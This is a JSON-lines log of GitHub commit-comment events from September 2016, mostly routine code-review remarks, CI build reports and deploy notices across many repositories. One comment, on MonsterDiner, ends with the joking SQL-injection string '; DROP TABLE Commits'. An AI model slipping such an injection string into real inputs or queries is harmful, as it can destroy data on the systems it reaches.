{"id":"4627297114","type":"CommitCommentEvent","actor":{"login":"pavelbar"},"repo":{"name":"pavelbar/mp2-lab1-set"},"payload":{"comment":{"id":19199038,"position":null,"line":null,"path":null,"commit_id":"5777ef826c6d775341cc2d7bda6636feb71b2e1f","created_at":"2016-09-27T22:14:04Z","updated_at":"2016-09-27T22:14:04Z","body":"Вот более оптимальный вариант, нет побитовых операций. Скажите, пожалуйста, почему нужно сделать через ==?"}},"created_at":"2016-09-27T22:14:04Z"}
{"id":"4627299420","type":"CommitCommentEvent","actor":{"login":"ryankaplan"},"repo":{"name":"mblair/dotfiles"},"payload":{"comment":{"id":19199044,"position":null,"line":null,"path":null,"commit_id":"6b65457fc50d56bb91476d389776b9ae75f57d36","created_at":"2016-09-27T22:14:37Z","updated_at":"2016-09-27T22:14:37Z","body":"👋 "}},"created_at":"2016-09-27T22:14:37Z"}
{"id":"4627300712","type":"CommitCommentEvent","actor":{"login":"mrunalp"},"repo":{"name":"mrunalp/ocid-1"},"payload":{"comment":{"id":19199050,"position":9,"line":27,"path":"test/pod.bats","commit_id":"fd91998ef3533ae161631db7791f3ded02f00289","created_at":"2016-09-27T22:14:54Z","updated_at":"2016-09-27T22:14:54Z","body":"Intentional as I wanted to do the cleanup for the second round as well and leave helper methods for edge cases."}},"created_at":"2016-09-27T22:14:54Z"}
{"id":"4627302024","type":"CommitCommentEvent","actor":{"login":"mdipierro"},"repo":{"name":"web2py/web2py"},"payload":{"comment":{"id":19199057,"position":null,"line":null,"path":null,"commit_id":"e5355b5b12a7de1ee93bee6ab91fd2b79260706a","created_at":"2016-09-27T22:15:11Z","updated_at":"2016-09-27T22:15:11Z","body":"Actually this breaks it. I had to revert. The best I could to make it backward compatible and follow a sane default was to use '...' instead of \"...\" everywhere. T.M() was really not thought to be used in this way. Reverted in 78cc6d69a29921d7dfd6fa207e8220f47eabeed8"}},"created_at":"2016-09-27T22:15:11Z"}
{"id":"4627308087","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19199072,"position":null,"line":null,"path":null,"commit_id":"426ae3c2381c355d4998b80ca581d321fc95f4bb","created_at":"2016-09-27T22:16:31Z","updated_at":"2016-09-27T22:16:31Z","body":"The following doc(s) have been deployed to the [codeofcon](https://codeofcon-static-docs.pantheonsite.io/docs) Multidev environment:\n- [CONTRIBUTING.md](https://github.com/pantheon-systems/documentation/commit/426ae3c2381c355d4998b80ca581d321fc95f4bb/CONTRIBUTING.md)\n"}},"created_at":"2016-09-27T22:16:31Z"}
{"id":"4627314312","type":"CommitCommentEvent","actor":{"login":"bertvansteen"},"repo":{"name":"bertvansteen/EpubSharp"},"payload":{"comment":{"id":19199085,"position":5,"line":5,"path":"EpubSharp.Tests/EpubBookTests.cs","commit_id":"c0403bb1b814744c360856065d78e04d09465640","created_at":"2016-09-27T22:17:56Z","updated_at":"2016-09-27T22:17:56Z","body":"Thanks for your feedback Arvydas, I see you choose cloudscribe.HtmlAgilityPack as well for your poject. I'm just using it in a toy project and didn't have any issues yet (read +/- 10000 epubs), I had issues with other .NET epub libraries but yours is capable of opening the most epubs (by far)"}},"created_at":"2016-09-27T22:17:56Z"}
{"id":"4627316189","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"pcfthecf/homework-responsive"},"payload":{"comment":{"id":19199093,"position":479,"line":479,"path":"css/style.css","commit_id":"9f6fdf32172f5cf8230e69a2dd5e1d92d25c92d3","created_at":"2016-09-27T22:18:21Z","updated_at":"2016-09-27T22:18:21Z","body":"Great work incorporating this additional media query !"}},"created_at":"2016-09-27T22:18:21Z"}
{"id":"4627326311","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"pcfthecf/homework-responsive"},"payload":{"comment":{"id":19199121,"position":116,"line":116,"path":"css/style.css","commit_id":"9f6fdf32172f5cf8230e69a2dd5e1d92d25c92d3","created_at":"2016-09-27T22:20:35Z","updated_at":"2016-09-27T22:20:35Z","body":"Great job scaling the logo for different screen sizes!"}},"created_at":"2016-09-27T22:20:35Z"}
{"id":"4627330873","type":"CommitCommentEvent","actor":{"login":"raoul189"},"repo":{"name":"elastic/elasticsearch-definitive-guide"},"payload":{"comment":{"id":19199130,"position":null,"line":null,"path":null,"commit_id":"1a6eec9ea85b9405a7d61ba2457b5544492ecb35","created_at":"2016-09-27T22:21:34Z","updated_at":"2016-09-27T22:21:34Z","body":"Executing a POST to change the number_of_replicas fails with:\r\n{\"error\":{\"root_cause\":[{\"type\":\"invalid_type_name_exception\",\"reason\":\"Document mapping type name can't start with '_'\"}],\"type\":\"invalid_type_name_exception\",\"reason\":\"Document mapping type name can't start with '_'\"},\"status\":400}\r\n\r\nChanging to PUT works as expected:\r\n{\"acknowledged\":true}"}},"created_at":"2016-09-27T22:21:34Z"}
{"id":"4627331863","type":"CommitCommentEvent","actor":{"login":"Rafael-Herculano"},"repo":{"name":"Rafael-Herculano/MeuPrimeiroProjeto"},"payload":{"comment":{"id":19199132,"position":null,"line":null,"path":null,"commit_id":"8d70a579c58ac461525a06447916c9fa056cfa8b","created_at":"2016-09-27T22:21:48Z","updated_at":"2016-09-27T22:21:48Z","body":"Alterando meu arquivo..."}},"created_at":"2016-09-27T22:21:48Z"}
{"id":"4627331934","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"pcfthecf/homework-responsive"},"payload":{"comment":{"id":19199133,"position":142,"line":142,"path":"css/style.css","commit_id":"9f6fdf32172f5cf8230e69a2dd5e1d92d25c92d3","created_at":"2016-09-27T22:21:49Z","updated_at":"2016-09-27T22:21:49Z","body":"How might you be able to combine this selector with others that you are applying similar styling to, in an effort to reduce the amount of code? "}},"created_at":"2016-09-27T22:21:49Z"}
{"id":"4627332583","type":"CommitCommentEvent","actor":{"login":"euphi"},"repo":{"name":"marvinroger/homie-esp8266"},"payload":{"comment":{"id":19199135,"position":40,"line":201,"path":"src/Homie/Boot/BootNormal.cpp","commit_id":"c46704a611896ef1586defc2df71a22f3696e1e5","created_at":"2016-09-27T22:21:57Z","updated_at":"2016-09-27T22:21:57Z","body":"When is the char array deleted again? A std:unique_ptr deletes it content, if it goes out of scope (never, because it belongs to the BootNormal object that is never deleted) or if a new value is assigned (never, because of the nullptr check)?!\r\n\r\nSo, for me, it looks like any mqtt message that is longer than the first  after the first will write over the end of the allocated buffer?"}},"created_at":"2016-09-27T22:21:57Z"}
{"id":"4627332893","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":19199136,"position":null,"line":null,"path":null,"commit_id":"294187bdacb059de245e0b8e0d3161d68a07bfbc","created_at":"2016-09-27T22:22:01Z","updated_at":"2016-09-27T22:22:01Z","body":"Please let's just not talk about it :( :("}},"created_at":"2016-09-27T22:22:01Z"}
{"id":"4627335379","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"pcfthecf/homework-responsive"},"payload":{"comment":{"id":19199143,"position":355,"line":355,"path":"css/style.css","commit_id":"9f6fdf32172f5cf8230e69a2dd5e1d92d25c92d3","created_at":"2016-09-27T22:22:35Z","updated_at":"2016-09-27T22:22:35Z","body":"Great job using different size font, and doing so in ems!"}},"created_at":"2016-09-27T22:22:35Z"}
{"id":"4627338272","type":"CommitCommentEvent","actor":{"login":"clooner"},"repo":{"name":"clooner/xtria"},"payload":{"comment":{"id":19199148,"position":2,"line":1,"path":"tg","commit_id":"b78b099c3093e48ca78382561354fbb3658c5b9a","created_at":"2016-09-27T22:23:13Z","updated_at":"2016-09-27T22:23:13Z","body":"c841f197b7eb9ef829e499a3e8b283a2d45ae023"}},"created_at":"2016-09-27T22:23:13Z"}
{"id":"4627338492","type":"CommitCommentEvent","actor":{"login":"bwiberg"},"repo":{"name":"codingInSpace/MonsterDiner"},"payload":{"comment":{"id":19199149,"position":null,"line":null,"path":null,"commit_id":"0330b1d6b0b164ddc2b34d573a06f8b58e286015","created_at":"2016-09-27T22:23:15Z","updated_at":"2016-09-27T22:23:15Z","body":"Looking good Jonathan!\r\n\r\n\r\n\r\n\r\n; DROP TABLE Commits"}},"created_at":"2016-09-27T22:23:15Z"}
{"id":"4627344518","type":"CommitCommentEvent","actor":{"login":"bertvansteen"},"repo":{"name":"bertvansteen/EpubSharp"},"payload":{"comment":{"id":19199161,"position":5,"line":5,"path":"EpubSharp.Tests/EpubBookTests.cs","commit_id":"c0403bb1b814744c360856065d78e04d09465640","created_at":"2016-09-27T22:24:33Z","updated_at":"2016-09-27T22:24:33Z","body":"If you have issues with cloudscribe.HtmlAgilityPack you might want to consider adding different references for .NET standard and .NET Framework 4.5+. You can do this in the project.json filie, additionally you need add a precompiler directive (#if) in ZipArchiveExt.cs to make sure the correct using statement is used."}},"created_at":"2016-09-27T22:24:33Z"}
{"id":"4627349453","type":"CommitCommentEvent","actor":{"login":"timolins"},"repo":{"name":"codyzu/now-client"},"payload":{"comment":{"id":19199169,"position":null,"line":null,"path":null,"commit_id":"cb7c30fa1fd412e8d002e171f3cfc8cc66d4abca","created_at":"2016-09-27T22:25:41Z","updated_at":"2016-09-27T22:25:41Z","body":"Awesome!"}},"created_at":"2016-09-27T22:25:41Z"}
{"id":"4627364349","type":"CommitCommentEvent","actor":{"login":"scotchi"},"repo":{"name":"YorickPeterse/oga"},"payload":{"comment":{"id":19199197,"position":null,"line":null,"path":null,"commit_id":"e0e0687dc29427c854c9fa6d3c19cee1c04f92c7","created_at":"2016-09-27T22:29:09Z","updated_at":"2016-09-27T22:29:09Z","body":"Would it make sense to also add some tests with more complex external docs (i.e. a few non-trivial, but valid HTML pages) where it basically did `doc == Oga.parse(doc.to_xml)` -- essentially making sure that even if the formatting changes that the internal parse tree remains non-lossy after a trip out to markup and back?"}},"created_at":"2016-09-27T22:29:09Z"}
{"id":"4627372189","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"pcfthecf/homework-responsive"},"payload":{"comment":{"id":19199209,"position":202,"line":202,"path":"css/style.css","commit_id":"9f6fdf32172f5cf8230e69a2dd5e1d92d25c92d3","created_at":"2016-09-27T22:30:59Z","updated_at":"2016-09-27T22:30:59Z","body":"You may want to consider making the inset a little less opaque, as I notice it's a bit difficult to read the text on smaller screens.  At the same time, it's awesome to see you using the rgba values!\r\n<img width=\"388\" alt=\"screen shot 2016-09-27 at 3 29 42 pm\" src=\"https://cloud.githubusercontent.com/assets/2281667/18894366/6246f208-84c7-11e6-9f6d-4874b538b916.png\">\r\n"}},"created_at":"2016-09-27T22:30:59Z"}
{"id":"4627373205","type":"CommitCommentEvent","actor":{"login":"developsfuturetech"},"repo":{"name":"developsfuturetech/shopizer"},"payload":{"comment":{"id":19199211,"position":null,"line":null,"path":null,"commit_id":"86c55815290b99c7f86a38013888bfc8872ec248","created_at":"2016-09-27T22:31:14Z","updated_at":"2016-09-27T22:31:14Z","body":"adding the changes to version"}},"created_at":"2016-09-27T22:31:14Z"}
{"id":"4627373852","type":"CommitCommentEvent","actor":{"login":"rgbriggs"},"repo":{"name":"rgbriggs/audit-testsuite"},"payload":{"comment":{"id":19199212,"position":121,"line":121,"path":"tests/filter_exclude/test","commit_id":"d79efe31c69ce82183a357a587fdcd73e3253f9b","created_at":"2016-09-27T22:31:22Z","updated_at":"2016-09-27T22:31:22Z","body":"There should be no record, so no need to check if it is a creat record...  Am I missing something?"}},"created_at":"2016-09-27T22:31:22Z"}
{"id":"4627375076","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19199215,"position":null,"line":null,"path":null,"commit_id":"6f1a966918f9627e8fcb0cc1959d66d4a23b8745","created_at":"2016-09-27T22:31:40Z","updated_at":"2016-09-27T22:31:40Z","body":"The following doc(s) have been deployed to the [codeofcon](https://codeofcon-static-docs.pantheonsite.io/docs) Multidev environment:\r\n- [CONTRIBUTING.md](https://github.com/pantheon-systems/documentation/commit/426ae3c2381c355d4998b80ca581d321fc95f4bb/CONTRIBUTING.md)\r\n- [docs/code-of-conduct](https://codeofcon-static-docs.pantheonsite.io/docs/code-of-conduct)\r\n- [docs/power-users](https://codeofcon-static-docs.pantheonsite.io/docs/power-users)\r\n- [CODE_OF_CONDUCT.md](https://github.com/pantheon-systems/documentation/commit/0818d05fff59c457ca7a0855a469d3984ddab366/CODE_OF_CONDUCT.md)\r\n"}},"created_at":"2016-09-27T22:31:40Z"}
{"id":"4627376054","type":"CommitCommentEvent","actor":{"login":"Johny5134234"},"repo":{"name":"Johny5134234/BlackHorizons"},"payload":{"comment":{"id":19199218,"position":null,"line":null,"path":null,"commit_id":"1bfb10d8026a48a2e46be9551bd19be10e38bf91","created_at":"2016-09-27T22:31:53Z","updated_at":"2016-09-27T22:31:53Z","body":"Also made the cube more glow-y!"}},"created_at":"2016-09-27T22:31:53Z"}
{"id":"4627382574","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19199239,"position":null,"line":null,"path":null,"commit_id":"34a5020df0f106c14b556990bf7d3f0f54841839","created_at":"2016-09-27T22:33:25Z","updated_at":"2016-09-27T22:33:25Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (1784 of 2374 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a5020df0f106c14b556990bf7d3f0f54841839-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a5020df0f106c14b556990bf7d3f0f54841839-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.15%25-red.svg)</a> \n"}},"created_at":"2016-09-27T22:33:25Z"}
{"id":"4627391512","type":"CommitCommentEvent","actor":{"login":"binkybear"},"repo":{"name":"offensive-security/nethunter-app"},"payload":{"comment":{"id":19199255,"position":null,"line":null,"path":null,"commit_id":"6686ff82f32bcb36ea1791476df9544a03bba14b","created_at":"2016-09-27T22:35:35Z","updated_at":"2016-09-27T22:35:35Z","body":"I don't see any errors directly related to HID from the logcat. \r\n\r\nIs the NH terminal crashing for you (appears so)? I am not seeing that issue myself, can you try the latest terminal:\r\n\r\nhttps://transfer.sh/9F34P/term-release.apk"}},"created_at":"2016-09-27T22:35:35Z"}
{"id":"4627393775","type":"CommitCommentEvent","actor":{"login":"electroduende21"},"repo":{"name":"numeroteca/contratosmenores"},"payload":{"comment":{"id":19199259,"position":null,"line":null,"path":null,"commit_id":"0764a16eca0d808e4ccbde8e43f257e4ea0e628e","created_at":"2016-09-27T22:36:10Z","updated_at":"2016-09-27T22:36:10Z","body":"Cierto, visitaría una web antigua??"}},"created_at":"2016-09-27T22:36:10Z"}
{"id":"4627395536","type":"CommitCommentEvent","actor":{"login":"tomcramer"},"repo":{"name":"cbeer/orangelight"},"payload":{"comment":{"id":19199265,"position":null,"line":null,"path":null,"commit_id":"e9d2522d1fea77a2b9383dafdad66c7ca829730b","created_at":"2016-09-27T22:36:35Z","updated_at":"2016-09-27T22:36:35Z","body":"Commas are stately, and add a touch of elegance to numbers larger than 9999. "}},"created_at":"2016-09-27T22:36:35Z"}
{"id":"4627397557","type":"CommitCommentEvent","actor":{"login":"tomcramer"},"repo":{"name":"cbeer/orangelight"},"payload":{"comment":{"id":19199271,"position":null,"line":null,"path":null,"commit_id":"e9d2522d1fea77a2b9383dafdad66c7ca829730b","created_at":"2016-09-27T22:37:03Z","updated_at":"2016-09-27T22:37:03Z","body":"Yes, Stanford looks at Princeton's apps during work hours. "}},"created_at":"2016-09-27T22:37:03Z"}
{"id":"4627397943","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19199275,"position":null,"line":null,"path":null,"commit_id":"34a5020df0f106c14b556990bf7d3f0f54841839","created_at":"2016-09-27T22:37:09Z","updated_at":"2016-09-27T22:37:09Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a5020df0f106c14b556990bf7d3f0f54841839-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-27T22:37:09Z"}
{"id":"4627404476","type":"CommitCommentEvent","actor":{"login":"jtimon"},"repo":{"name":"jgriffiths/libwally-core"},"payload":{"comment":{"id":19199302,"position":32,"line":265,"path":"src/test/test_bip32.py","commit_id":"1ece5c654c6cdc64e2dae6379a4c8dcd2b73754a","created_at":"2016-09-27T22:38:47Z","updated_at":"2016-09-27T22:38:47Z","body":"I don't think trying to maintain this is worth it."}},"created_at":"2016-09-27T22:38:47Z"}
{"id":"4627405493","type":"CommitCommentEvent","actor":{"login":"fgeek"},"repo":{"name":"halojoy/QuickerBB"},"payload":{"comment":{"id":19199305,"position":null,"line":null,"path":null,"commit_id":"44dee4fe43e3e471cd4a3f06b9b39f8ecdc998b7","created_at":"2016-09-27T22:39:02Z","updated_at":"2016-09-27T22:39:02Z","body":"Shouldn't the version number be 0.7.1?"}},"created_at":"2016-09-27T22:39:02Z"}
{"id":"4627412245","type":"CommitCommentEvent","actor":{"login":"jtimon"},"repo":{"name":"jgriffiths/libwally-core"},"payload":{"comment":{"id":19199311,"position":null,"line":null,"path":null,"commit_id":"4c8f76fa3e99a302eeb8d3341f0e79e784b2cb31","created_at":"2016-09-27T22:40:38Z","updated_at":"2016-09-27T22:40:38Z","body":"How do I see these warnings?\r\n"}},"created_at":"2016-09-27T22:40:38Z"}
{"id":"4627424504","type":"CommitCommentEvent","actor":{"login":"rgbriggs"},"repo":{"name":"rgbriggs/audit-testsuite"},"payload":{"comment":{"id":19199329,"position":87,"line":87,"path":"tests/filter_sessionid/test","commit_id":"2584bcc842da7511dbac3482f2eaf2afc6f2db39","created_at":"2016-09-27T22:43:34Z","updated_at":"2016-09-27T22:43:34Z","body":"Arguably easier to check for a known sessionid that we knew provoked a record rather than coding to check for a sessionid that is set."}},"created_at":"2016-09-27T22:43:34Z"}
{"id":"4627427208","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19199336,"position":null,"line":null,"path":null,"commit_id":"254f8da23e919f16e2fbdbfec901c613e8f33b91","created_at":"2016-09-27T22:44:12Z","updated_at":"2016-09-27T22:44:12Z","body":"The following doc(s) have been deployed to the [codeofcon](https://codeofcon-static-docs.pantheonsite.io/docs) Multidev environment:\r\n- [CONTRIBUTING.md](https://github.com/pantheon-systems/documentation/commit/426ae3c2381c355d4998b80ca581d321fc95f4bb/CONTRIBUTING.md)\r\n- [docs/code-of-conduct](https://codeofcon-static-docs.pantheonsite.io/docs/code-of-conduct)\r\n- [docs/power-users](https://codeofcon-static-docs.pantheonsite.io/docs/power-users)\r\n- [CODE_OF_CONDUCT.md](https://github.com/pantheon-systems/documentation/commit/0818d05fff59c457ca7a0855a469d3984ddab366/CODE_OF_CONDUCT.md)\r\n"}},"created_at":"2016-09-27T22:44:12Z"}
{"id":"4627430673","type":"CommitCommentEvent","actor":{"login":"stevengill"},"repo":{"name":"apache/cordova-cli"},"payload":{"comment":{"id":19199350,"position":null,"line":null,"path":null,"commit_id":"258eb28fcf29de2a231c977a169b7a0448bb113f","created_at":"2016-09-27T22:45:04Z","updated_at":"2016-09-27T22:45:04Z","body":"Hey @vladimir-kotikov, did you mean to update the cordova-lib dep to 6.4.0-dev? Seems like a mistake to me. "}},"created_at":"2016-09-27T22:45:04Z"}
{"id":"4627431848","type":"CommitCommentEvent","actor":{"login":"DostZeroMachine"},"repo":{"name":"SEGosaurus/SEGosaurus.github.io"},"payload":{"comment":{"id":19199352,"position":3,"line":4,"path":"README.md","commit_id":"025d44fb0cb1818343c441abbab35b311244bcc0","created_at":"2016-09-27T22:45:22Z","updated_at":"2016-09-27T22:45:22Z","body":"test"}},"created_at":"2016-09-27T22:45:22Z"}
{"id":"4627433287","type":"CommitCommentEvent","actor":{"login":"isgarcia"},"repo":{"name":"isgarcia/dojo_rules"},"payload":{"comment":{"id":19199359,"position":null,"line":null,"path":null,"commit_id":"9bb29c922c20c213255d2d2a059f46695df16b0d","created_at":"2016-09-27T22:45:44Z","updated_at":"2016-09-27T22:45:44Z","body":"Prueba actualizacion introduction"}},"created_at":"2016-09-27T22:45:44Z"}
{"id":"4627433825","type":"CommitCommentEvent","actor":{"login":"rgbriggs"},"repo":{"name":"rgbriggs/audit-testsuite"},"payload":{"comment":{"id":19199361,"position":87,"line":87,"path":"tests/filter_sessionid/test","commit_id":"2584bcc842da7511dbac3482f2eaf2afc6f2db39","created_at":"2016-09-27T22:45:53Z","updated_at":"2016-09-27T22:45:53Z","body":"Otherwise, we should really parse out the ses= from that match and test for it not equalling -1 (or is it zero if unset?)."}},"created_at":"2016-09-27T22:45:53Z"}
{"id":"4627436285","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"C5T/Current"},"payload":{"comment":{"id":19199369,"position":3,"line":28,"path":"Karl/integrations/nodejs/test.js","commit_id":"145384ebe222d7c0679f977f98f078263188d5a1","created_at":"2016-09-27T22:46:30Z","updated_at":"2016-09-27T22:46:30Z","body":"It's probably about the Node packages that are always up to date unless you specify the strict version mapping in a separate file."}},"created_at":"2016-09-27T22:46:30Z"}
{"id":"4627437413","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19199373,"position":null,"line":null,"path":null,"commit_id":"5056c17b4c89e663ca0e196bccb1af944af6bcd9","created_at":"2016-09-27T22:46:48Z","updated_at":"2016-09-27T22:46:48Z","body":"The following doc(s) have been deployed to the [codeofcon](https://codeofcon-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_views/doc.html](https://github.com/pantheon-systems/documentation/commit/5056c17b4c89e663ca0e196bccb1af944af6bcd9/source/_views/doc.html)\n"}},"created_at":"2016-09-27T22:46:48Z"}
{"id":"4627443060","type":"CommitCommentEvent","actor":{"login":"samoht"},"repo":{"name":"nojb/ocaml-imap"},"payload":{"comment":{"id":19199382,"position":561,"line":747,"path":"lib/imap.ml","commit_id":"34ae26d7f03cbaca516491bbcfe729bdb73fce0b","created_at":"2016-09-27T22:48:19Z","updated_at":"2016-09-27T22:48:19Z","body":"You might be interested by https://github.com/inhabitedtype/angstrom instead of rebuilding a new parser combinator library? :-)"}},"created_at":"2016-09-27T22:48:19Z"}
{"id":"4627445724","type":"CommitCommentEvent","actor":{"login":"rodrigues"},"repo":{"name":"rodrigues/toniq"},"payload":{"comment":{"id":19199392,"position":null,"line":null,"path":null,"commit_id":"4f822f9e2f8f750f5648fb0ae8e8b55878a03d08","created_at":"2016-09-27T22:49:00Z","updated_at":"2016-09-27T22:49:00Z","body":"@joakimk the [Efficiency Guide](http://erlang.org/doc/efficiency_guide/commoncaveats.html#id60206) claims that \"Creating timers using `erlang:send_after/3` and `erlang:start_timer/3` , is much more efficient than using the timers provided by the `timer` module in STDLIB. The timer module uses a separate process to manage the timers. That process can easily become overloaded if many processes create and cancel timers frequently (especially when using the SMP emulator).\""}},"created_at":"2016-09-27T22:49:00Z"}
{"id":"4627446397","type":"CommitCommentEvent","actor":{"login":"acliss19xx"},"repo":{"name":"acliss19xx/ikoma-library-app-proto"},"payload":{"comment":{"id":19199394,"position":null,"line":null,"path":null,"commit_id":"11aa0edb8f8f086c735560a49ca95acc9e4de435","created_at":"2016-09-27T22:49:11Z","updated_at":"2016-09-27T22:49:11Z","body":"カルーセル表示に設定した場合の挙動を変更しました。表示は1冊ずつ、スワイプで次へ行く形です。\r\n表示に関しては、詳細を表示しています。\r\n元々あった詳細画面の、「司書コメントのモーダル設定」と、「戻る」ボタンは、削除しています。\r\n「司書コメントのモーダル設定」に関しては、カルーセル内とモーダルウィンドウの表示に関しては相談したいです。"}},"created_at":"2016-09-27T22:49:11Z"}
{"id":"4627448699","type":"CommitCommentEvent","actor":{"login":"lucasart"},"repo":{"name":"lucasart/Demolito"},"payload":{"comment":{"id":19199403,"position":null,"line":null,"path":null,"commit_id":"fcad29200a5e061f6037c770be2b610db047698c","created_at":"2016-09-27T22:49:46Z","updated_at":"2016-09-27T22:49:46Z","body":"10k games against Sungorus, in 8\"+0.08\", hash=8:\r\n```\r\n./cutechess-cli \\\r\n  -each proto=uci tc=8+0.08 option.Hash=8 timemargin=20 \\\r\n  -openings file='./book5.epd' format=epd -repeat \\\r\n  -engine cmd=$1 name=$1 \\\r\n  -engine cmd=$2 name=$2 \\\r\n  -pgnout $3 \\\r\n  -concurrency 7 -rounds 10000 -ratinginterval 25 -recover \\\r\n  -draw movenumber=40 movecount=8 score=20 \\\r\n  -resign movecount=3 score=900\r\n```\r\nStill a long way to go:\r\n```\r\ndemolito vs sungorus_1.4: 2115 - 6684 - 1201  [0.272] 10000\r\nELO difference: -171.42 +/- 7.04\r\n```"}},"created_at":"2016-09-27T22:49:46Z"}
{"id":"4627448839","type":"CommitCommentEvent","actor":{"login":"r-owen"},"repo":{"name":"lsst/afw"},"payload":{"comment":{"id":19199404,"position":null,"line":null,"path":null,"commit_id":"c0debc6e0715e8f9d715f1f211b770d8dae0605c","created_at":"2016-09-27T22:49:48Z","updated_at":"2016-09-27T22:49:48Z","body":"We would not only have to fix our code to handle missing values, but also makes sure astropy.io.fits can handle such files before I'd be happy writing them. At that point...yes. Omitting unknown values is not a very good way to handle this, but is the only FITS-compliant way we can do it at this time (other than writing VisitInfo to a binary table, which is supported but is presently only used for coadds)."}},"created_at":"2016-09-27T22:49:48Z"}
{"id":"4627449350","type":"CommitCommentEvent","actor":{"login":"KiberInfinity"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":19199405,"position":null,"line":null,"path":null,"commit_id":"8a4a8a30358e958b3cf93a957730829fd1b8d1fc","created_at":"2016-09-27T22:49:56Z","updated_at":"2016-09-27T22:49:56Z","body":"пока что постоянно не дёргает) да и как им ещё проверять, что пользователь удалил расширение, после того как они попросили это сделать?"}},"created_at":"2016-09-27T22:49:56Z"}
{"id":"4627452810","type":"CommitCommentEvent","actor":{"login":"tomtung"},"repo":{"name":"facebookresearch/fastText"},"payload":{"comment":{"id":19199412,"position":null,"line":null,"path":null,"commit_id":"3f2cef0a75929eeb72e078b118da04defbf7b200","created_at":"2016-09-27T22:50:41Z","updated_at":"2016-09-27T22:50:41Z","body":"This is great! Thanks!"}},"created_at":"2016-09-27T22:50:41Z"}
{"id":"4627455552","type":"CommitCommentEvent","actor":{"login":"timj"},"repo":{"name":"lsst/afw"},"payload":{"comment":{"id":19199422,"position":null,"line":null,"path":null,"commit_id":"c0debc6e0715e8f9d715f1f211b770d8dae0605c","created_at":"2016-09-27T22:51:23Z","updated_at":"2016-09-27T22:51:23Z","body":"That's my point. We should properly schedule some work to fix astropy.io.fits to handle this. It's easy to justify, not much work, and shows that we are serious at being community contributors. I'm happy for this band aid for the moment but I think we have to plan to fix it properly."}},"created_at":"2016-09-27T22:51:23Z"}
{"id":"4627464975","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"C5T/Current"},"payload":{"comment":{"id":19199447,"position":3,"line":28,"path":"Karl/integrations/nodejs/test.js","commit_id":"145384ebe222d7c0679f977f98f078263188d5a1","created_at":"2016-09-27T22:53:49Z","updated_at":"2016-09-27T22:53:49Z","body":"RE: const, from here http://node.green/#const looks like it's been there since Node 4.3.2, except for triggering an error for certain syntax errors.\r\n\r\nRE: const performance, I doubt it is important 1) for the require statements that are run once per module; 2) for the most of the code that is not a bottleneck, which is discovered by profiling."}},"created_at":"2016-09-27T22:53:49Z"}
{"id":"4627469708","type":"CommitCommentEvent","actor":{"login":"clooner"},"repo":{"name":"blackwolfadmin/pika_launcher_bot"},"payload":{"comment":{"id":19199452,"position":2,"line":1,"path":"tg","commit_id":"41a4db080fa1821d26172297da83827c3feef3a3","created_at":"2016-09-27T22:55:03Z","updated_at":"2016-09-27T22:55:03Z","body":"77df83e6d53196b3b160eae7718ab8608583a08"}},"created_at":"2016-09-27T22:55:03Z"}
{"id":"4627470332","type":"CommitCommentEvent","actor":{"login":"Braidis"},"repo":{"name":"coinbase/coinbase-python"},"payload":{"comment":{"id":19199457,"position":null,"line":null,"path":null,"commit_id":"04d1aa8e6fef91b4cfd51728f7a9061e56506ab4","created_at":"2016-09-27T22:55:12Z","updated_at":"2016-09-27T22:55:12Z","body":"[master-fd7e6614c60430e728e53ed59a7d432e03ce9779.zip](https://github.com/coinbase/coinbase-python/files/496795/master-fd7e6614c60430e728e53ed59a7d432e03ce9779.zip)\r\n"}},"created_at":"2016-09-27T22:55:12Z"}
